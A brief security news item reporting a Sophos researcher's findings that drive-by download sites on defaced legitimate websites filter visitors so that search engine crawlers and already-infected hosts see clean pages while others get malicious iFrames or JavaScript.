Drive By Download Sites Using New Tricks To Avoid Detection

Amid an increase in defacements of legitimate websites over the past few weeks, Fraser Howard, a researcher from Sophos, has discovered that the groups behind the attacks are increasingly using sophisticated filtering and dynamic content to avoid detection by search engines and web filtering firms.

Amid an increase in defacements of legitimate websites over the past few weeks, Fraser Howard, a researcher from Sophos, has discovered that the groups behind the attacks are increasingly using sophisticated filtering and dynamic content to avoid detection by search engines and web filtering firms.

If an older generation of drive-by Web attacks were dumb, this new generation is intelligent, Howard said. According to his report, many sites that Sophos found hosting attacks are using complex logic to limit who is served malicious content include – or block – malicious code injection depending on the source of Web traffic requests to the compromised sites.

Howard’s study of the malicious payloads found logic that allowed the attackers to automatically check for requests from bot-infected hosts versus uninfected hosts or search engine Web crawlers. The goal was to serve malicious attacks (either iFrame attacks or malicious Javascript) to uninfected hosts, while steering clear of search engines or other monitoring outfits looking to blacklist compromised pages. The code analyzed by Howard included local IP blacklists that ensured  search engine bots were only served clean HTML pages, while users who had already been hit didn’t get reinfected, which Howard says makes it harder to investigate the problem.

Head over the Naked Security to read Howard’s entire report and check out a diagram that illustrate this type of attack.

Suggested articles